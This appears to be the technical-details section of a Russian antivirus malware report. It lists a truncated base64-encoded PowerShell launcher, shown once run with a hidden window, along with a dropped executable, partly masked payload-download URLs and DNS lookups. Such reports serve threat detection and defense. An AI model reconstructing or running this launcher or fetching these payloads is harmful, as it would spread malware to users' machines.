Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABOAEMAUwBXAE0AaAB0AHgAPQAnAFEATwBQAEUAVQByAHIAbwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAARQBjAGAAVQBSAEkAdABZAGAAUAByAG8AdABvAGMATwBMACIAIAA9AC...
- %HOMEPATH%\82.exe
- http://ka###ayless.com/lc5_146_ekvvs/
- http://ma##oft.cz/ajnt_e7v_uyoi/
- http://ju#####playground.net/q_9q9g8_wf/
- http://mu###rental.com/65l_1po_7v7k0864m/
- http://mu###rental.com/cgi-sys/suspendedpage.cgi
- http://mo##o.net/cgi-bin/4kg_v47_gs79hfwr5u/
- DNS ASK ka###ayless.com
- DNS ASK ma##oft.cz
- DNS ASK ju#####playground.net
- DNS ASK mu###rental.com
- DNS ASK mo##o.net
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABOAEMAUwBXAE0AaAB0AHgAPQAnAFEATwBQAEUAVQByAHIAbwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAARQBjAGAAVQBSAEkAdABZAGAAUAByAG8AdABvAGMATwBMACIAIAA9AC...' (со скрытым окном)